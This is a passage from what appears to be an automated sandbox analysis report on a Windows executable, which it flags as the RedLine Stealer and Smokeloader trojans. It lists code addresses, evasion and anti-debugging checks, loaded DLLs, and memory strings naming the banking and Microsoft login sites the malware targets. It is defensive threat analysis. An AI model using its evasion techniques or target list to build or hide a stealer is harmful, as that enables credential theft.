                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00457B300_2_00457B30
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004283340_2_00428334
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041EBEB0_2_0041EBEB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00415C7E0_2_00415C7E
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004184130_2_00418413
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043A4FE0_2_0043A4FE
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424C8D0_2_00424C8D
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043BCA40_2_0043BCA4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004165480_2_00416548
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004395350_2_00439535
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041764A0_2_0041764A
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043D6000_2_0043D600
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004126B90_2_004126B9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004297300_2_00429730
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00434FAC0_2_00434FAC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235D2210_2_0235D221
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023652130_2_02365213
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02378A670_2_02378A67
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023422B40_2_023422B4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023712BE0_2_023712BE
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233BA830_2_0233BA83
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023642E70_2_023642E7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234E2EA0_2_0234E2EA
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023452D70_2_023452D7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02359ADA0_2_02359ADA
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236DB370_2_0236DB37
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235C3410_2_0235C341
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233E3B50_2_0233E3B5
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233B3900_2_0233B390
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233AB8F0_2_0233AB8F
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023603F50_2_023603F5
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233DBFB0_2_0233DBFB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023793C20_2_023793C2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0238D3C10_2_0238D3C1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236D8670_2_0236D867
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023478B10_2_023478B1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235D8BF0_2_0235D8BF
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236908F0_2_0236908F
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023610D30_2_023610D3
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023429200_2_02342920
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023599970_2_02359997
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234867A0_2_0234867A
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234EE520_2_0234EE52
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354EF40_2_02354EF4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02345EE50_2_02345EE5
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02359EE20_2_02359EE2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023326DD0_2_023326DD
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236BF0B0_2_0236BF0B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236A7650_2_0236A765
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023467AF0_2_023467AF
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236979C0_2_0236979C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235AFE90_2_0235AFE9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235BC2C0_2_0235BC2C
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02336C080_2_02336C08
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234FC0B0_2_0234FC0B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023364720_2_02336472
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234047F0_2_0234047F
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234D4500_2_0234D450
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02357C470_2_02357C47
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234ACB00_2_0234ACB0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234B4B80_2_0234B4B8
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0237F4AB0_2_0237F4AB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236048F0_2_0236048F
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234C4D70_2_0234C4D7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235F4DF0_2_0235F4DF
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02359CC20_2_02359CC2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02335D110_2_02335D11
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023355400_2_02335540
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02366D430_2_02366D43
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023725B10_2_023725B1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235859B0_2_0235859B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235A5D40_2_0235A5D4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0236B5C90_2_0236B5C9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess token adjusted: Load DriverJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 0233E3B5 appears 36 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 00438E28 appears 39 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 0043D070 appears 51 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 0040E14E appears 52 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 0236D2D7 appears 50 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 004360E1 appears 144 times
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: String function: 0233A905 appears 38 times
                    Source: cgln32y2HF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.4572460076.0000000000799000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.4572651324.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@0/1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0079A16E CreateToolhelp32Snapshot,Module32First,0_2_0079A16E
                    Source: cgln32y2HF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSystem information queried: HandleInformationJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.0000000003074000.00000004.00000020.00020000.00000000.sdmp, cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B40000.00000004.00000020.00020000.00000000.sdmp, cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: cgln32y2HF.exeReversingLabs: Detection: 86%
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: fltlib.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: my-global-render.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeUnpacked PE file: 0.2.cgln32y2HF.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeUnpacked PE file: 0.2.cgln32y2HF.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00464074 push B000468Ch; retn 0044h0_2_00464079
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00463CAD push esi; ret 0_2_00463CB6
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h0_2_00403D71
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00452768 push ecx; ret 0_2_0045277B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023829CF push ecx; ret 0_2_023829E2
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02333FD3 push eax; mov dword ptr [esp], 00000000h0_2_02333FD8

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00401FF9 Sleep,ExitProcess,0_2_00401FF9
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02332260 Sleep,ExitProcess,0_2_02332260
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: GetComputerName,DecisionNodes,ExitProcessgraph_0-74025
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_0-74122
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-74122
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-74135
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: RegQueryValue,DecisionNodes,ExitProcessgraph_0-74069
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-74076
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-74076
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_0-74069
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
                    Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00451F08 FindFirstFileExW,0_2_00451F08
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00451FBC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02382223 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_02382223
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0238216F FindFirstFileExW,0_2_0238216F
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: cgln32y2HF.exe, 00000000.00000002.4572489278.0000000000819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000003.2678791997.0000000002FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: cgln32y2HF.exe, 00000000.00000002.4573012303.0000000002B9C000.00000004.00000020.00020000.00000000.sdmp, cgln32y2HF.exe, 00000000.00000002.4572489278.0000000000819000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: cgln32y2HF.exe, 00000000.00000003.2678791997.0000000002FF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: YNVMware
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: cgln32y2HF.exe, 00000000.00000002.4573480702.00000000030CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeAPI call chain: ExitProcess graph end nodegraph_0-74015

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC640_2_004244E4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleepgraph_0-74101
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess Stats: CPU usage > 42% for more than 60s
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeSystem information queried: KernelDebuggerInformationJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess queried: DebugObjectHandleJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeProcess queried: DebugFlagsJump to behavior
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044E33B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation,0_2_0041F9A4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00422177 mov eax, dword ptr fs:[00000030h]0_2_00422177
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h]0_2_00443998
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h]0_2_0041F9A4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h]0_2_004262A1
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h]0_2_0043B362
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h]0_2_0044FB15
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h]0_2_004244E4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h]0_2_004224A3
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004245EC mov eax, dword ptr fs:[00000030h]0_2_004245EC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h]0_2_00421EEB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00422817 mov eax, dword ptr fs:[00000030h]0_2_00422817
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h]0_2_0041F916
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h]0_2_004269E4
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424995 mov eax, dword ptr fs:[00000030h]0_2_00424995
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h]0_2_00426A42
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h]0_2_0042F265
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h]0_2_00424B24
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h]0_2_0041EBEB
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424BED mov eax, dword ptr fs:[00000030h]0_2_00424BED
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h]0_2_00424C8D
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h]0_2_0041E6F0
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h]0_2_00429EF7
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_00799A4B push dword ptr fs:[00000030h]0_2_00799A4B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02352A7E mov eax, dword ptr fs:[00000030h]0_2_02352A7E
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234FB7D mov eax, dword ptr fs:[00000030h]0_2_0234FB7D
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02373BFF mov ecx, dword ptr fs:[00000030h]0_2_02373BFF
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354BFC mov eax, dword ptr fs:[00000030h]0_2_02354BFC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354BFC mov eax, dword ptr fs:[00000030h]0_2_02354BFC
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_023523DE mov eax, dword ptr fs:[00000030h]0_2_023523DE
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354853 mov eax, dword ptr fs:[00000030h]0_2_02354853
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0233092B mov eax, dword ptr fs:[00000030h]0_2_0233092B
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234E957 mov eax, dword ptr fs:[00000030h]0_2_0234E957
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02352152 mov eax, dword ptr fs:[00000030h]0_2_02352152
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0235A15E mov eax, dword ptr fs:[00000030h]0_2_0235A15E
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354E54 mov eax, dword ptr fs:[00000030h]0_2_02354E54
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_0234EE52 mov eax, dword ptr fs:[00000030h]0_2_0234EE52
                    Source: C:\Users\user\Desktop\cgln32y2HF.exeCode function: 0_2_02354EF4 mov eax, dword ptr fs:[00000030h]0_2_02354EF4
